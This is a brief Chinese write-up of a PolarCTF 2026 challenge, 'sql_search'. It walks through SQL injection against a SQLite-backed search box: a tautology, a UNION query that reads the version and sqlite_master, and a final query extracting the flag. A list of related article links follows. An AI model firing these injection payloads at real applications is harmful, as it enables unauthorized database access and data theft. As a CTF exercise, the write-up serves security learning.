【PolarCTF2026年春季挑战赛】sql_search

大方子2026-03-28 9:17

输入框很明显的SQL注入

使用下语句进行注入

复制代码 
' or '1'='1

通过order by 语句,知道有3列

2和3字段有回显

查询sqlite版本

复制代码 
' union select 1,2,sqlite_version()-- -

查询sqlite数据表

复制代码 
' union select 1,2,sql from sqlite_master-- -

发现有flaggggggggggg表,接下来查询得到flag

复制代码 
' union select 1,2,flag from flaggggggggggg-- -
相关推荐
一名优秀的码农2 小时前
vulhub系列-80-Venom: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
PinTrust SSL证书4 小时前
Sectigo(Comodo)域名型DV通配符SSL
网络·网络协议·http·网络安全·https·软件工程·ssl
2301_780789664 小时前
2025年ddos防护还能防护住越来越大的ddos攻击吗
网络·后端·tcp/ip·网络安全·架构·ddos
以神为界5 小时前
PHP与数据库交互实操:连接方法+SQL注入防范+系统数据库解析
数据库·sql·网络安全·php·web
白帽子黑客-宝哥6 小时前
网络安全有哪些赛事
web安全·网络安全·ctf·漏洞挖掘·网络安全大赛
菩提小狗17 小时前
每日安全情报报告 · 2026-04-21
网络安全·漏洞·cve·安全情报·每日安全
сокол18 小时前
【网安-应急响应-基础记录】Windows入侵排查
windows·web安全·网络安全·系统安全
Bruce_Liuxiaowei18 小时前
Windows防火墙规则导出工具:让安全配置可备份、可迁移、可审计
运维·windows·安全·网络安全
Y学院21 小时前
虚拟机安装ParrotOS完整教程(VMware+VirtualBox双版本)
安全·网络安全
程序猿编码1 天前
给Linux程序穿“隐身衣”——ELF运行时加密器全解析(C/C++代码实现)
linux·c语言·c++·网络安全·elf·内存安全
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026年4月AI大事件深度解读:大模型竞争进入“深水区“04近期有什么ai的新消息,新动态? 2026.4月052026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07CC-Switch & Claude 基于 Linux 服务器安装使用指南08从限购到畅通:GLM-5.1 Coding Plan接入攻略09Claude Code Windows 兼容性问题:指定版本 2.1.112 可解决10codex app每次打开重连5次Reconnecting问题解决